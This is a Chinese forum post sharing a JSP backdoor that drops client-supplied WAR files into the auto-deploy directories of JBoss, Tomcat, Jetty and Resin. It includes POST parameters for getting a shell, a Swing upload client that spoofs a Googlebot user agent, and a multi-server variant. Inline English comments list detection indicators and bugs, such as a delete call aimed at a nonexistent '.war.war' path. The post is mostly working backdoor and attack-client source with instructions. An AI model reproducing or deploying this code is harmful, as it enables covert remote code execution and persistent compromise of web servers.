在乌云社区发现有人发了一个Jboss的自动部署war的后门求此后门的利用方法。
<%@page
import="java.io.*,
java.util.*,
sun.misc.BASE64Decoder"%>
<%
// Scriptlet with no page output: depending on whether pUBYyDsT is present it
// either writes a client-supplied archive into JBoss's deploy directory or
// deletes one. Indicators for detection: the two parameter names below, a
// read of jboss.server.home.dir from a JSP, and file creation/deletion under
// <server home>/deploy/ by the application-server process. Both catch blocks
// are empty, so the container logs nothing on failure.
String PJdpj = "";   // base64 text of the archive to write
String pIGx = "";    // archive base name chosen by the client
String RSVw = System.getProperty("jboss.server.home.dir");   // if unset, the paths below begin with the literal "null/"
if (request.getParameter("pUBYyDsT") != null) {
try {
PJdpj = request.getParameter("pUBYyDsT");
pIGx = request.getParameter("oAEICWIo");
byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj);   // sun.misc internal API; decoded bytes are written as-is
String MfNJU = RSVw + "/deploy/" + pIGx + ".war";   // the name is concatenated unchecked, so the write location is client-influenced
FileOutputStream twkH = new FileOutputStream(MfNJU);   // not closed if write() throws
twkH.write(rFPE);
twkH.close();
} catch (Exception e) {
// swallowed -- the response is identical whether the write succeeded or not
}
} else {
try {
String VBpM = request.getParameter("oAEICWIo");
String dhkDS = RSVw + "/deploy/" + VBpM + ".war";
new File(dhkDS).delete();   // boolean result ignored
} catch (Exception e) {
// swallowed
}
}
%>
挺聪明。Server一般都提供了自动部署服务，也就是说只需要把war包放到默认能够自动部署的目录就行了。
POST提交:http://xxx.com/xxx.jsp
参数:
pUBYyDsT=war文件的Base64编码&oAEICWIo=Test
然后请求http://xxx.com/Test就getshell了。Test是war文件的项目名。
只需简单地改改getProperty的属性值就能够通用到Tomcat等Server。
客户端工具:
源码:
private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
// Swing handler: reads the file named in jTextField3, base64-encodes it and
// POSTs it (via Jsoup) to the URL in jTextField1 as parameter pUBYyDsT, with
// the text of jTextField2 sent as oAEICWIo. Outcome text goes to jTextArea1.
// Network-side indicators: a POST carrying a large base64 body under a
// "Googlebot/2.1" user agent (the literal below lacks the closing parenthesis
// of a well-formed UA string) from a host that will not pass a reverse-DNS
// check for googlebot.com -- Googlebot does not POST form data.
String war = jTextField3.getText();
if(war!=null){
try {
FileInputStream fis = new FileInputStream(new File(war));   // closed only on the success path; leaks if read/encode throws
byte[] b = new byte[1024];
int n = 0;
ByteArrayOutputStream baos = new ByteArrayOutputStream();   // whole file is buffered in memory before encoding
while((n=fis.read(b))!=-1){
baos.write(b,0,n);
}
String content = new BASE64Encoder().encode(baos.toByteArray());   // sun.misc.BASE64Encoder (internal API)
fis.close();
Map<String,String> map = new HashMap<String, String>();
map.put("oAEICWIo", jTextField2.getText());   // archive name expected by the server-side page
map.put("pUBYyDsT", content);
Jsoup.connect(jTextField1.getText()).data(map).userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(30000).post();   // 30 s timeout; response body discarded
jTextArea1.setText("请求成功...");   // "request succeeded" -- shown whenever post() returns without throwing
} catch (Exception e) {
jTextArea1.setText(e.toString());   // any failure (I/O, non-success HTTP status) is shown verbatim
}
}
}
private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {
// Swing handler: opens a file chooser rooted at the user's home directory and
// copies the chosen path into jTextField3; when the dialog is cancelled,
// path stays null and the field is cleared. Nothing checks that the chosen
// file is actually a .war.
int result = 0;
String path = null;
JFileChooser fileChooser = new JFileChooser();
FileSystemView fsv = FileSystemView.getFileSystemView();
fileChooser.setCurrentDirectory(fsv.getHomeDirectory());
fileChooser.setDialogTitle("请选择war文件.");   // "Please choose a war file."
fileChooser.setApproveButtonText("确定");      // "OK"
fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY);
result = fileChooser.showOpenDialog(fileChooser);   // parent component is the chooser itself rather than the main frame
if (JFileChooser.APPROVE_OPTION == result) {
path=fileChooser.getSelectedFile().getPath();
}
jTextField3.setText(path);   // setText(null) deletes the old text
}
修改后的jsp后门:
<%@page import="java.io.*,java.util.*,sun.misc.BASE64Decoder"%>
<%!
String getServer(HttpServletRequest request,String name){
// Maps a lower-cased server-info string to the directory this page treats as
// that container's deploy directory. `request` is accepted but never read.
// Each branch builds the path from a system property; if that property is
// unset the result starts with the literal "null" (String concatenation with
// a null value). Unrecognised servers fall through to the catalina.home layout.
if(name.indexOf("jboss")!=-1){
return System.getProperty("jboss.server.home.dir")+"/deploy/";
}else if(name.indexOf("jetty")!=-1){
return System.getProperty("jetty.home")+"/webapps/";
}else if(name.indexOf("resin")!=-1){
return System.getProperty("resin.home")+"/webapps/";
}
return System.getProperty("catalina.home")+"/webapps/";
}
%>
<%
// Scriptlet: when pUBYyDsT is present, writes its base64-decoded bytes to
// <deploy dir>/<oAEICWIo>.war, where the deploy dir is chosen from
// application.getServerInfo(); backslashes in that path are normalised to "/".
// Indicators for detection are the same as the JBoss-only variant: the two
// parameter names, and a .war created under the deploy directory by the
// server process. Errors are swallowed, so the page never reports failure.
String PJdpj = request.getParameter("pUBYyDsT");
if (PJdpj!= null) {
try {
String RSVw = getServer(request, application.getServerInfo().toLowerCase()).replaceAll("\\\\", "/")+request.getParameter("oAEICWIo")+".war";   // full target path; the name parameter is concatenated unchecked
FileOutputStream twkH = new FileOutputStream(RSVw);   // not closed if write() throws
twkH.write(new BASE64Decoder().decodeBuffer(PJdpj));
twkH.close();
String dhkDS = RSVw+ ".war";   // RSVw already ends in ".war", so this names "<name>.war.war"
new File(dhkDS).delete();   // targets a path that was never written; the archive written above remains on disk (forensic artifact)
} catch (Exception e) {
// swallowed
}
}
%>



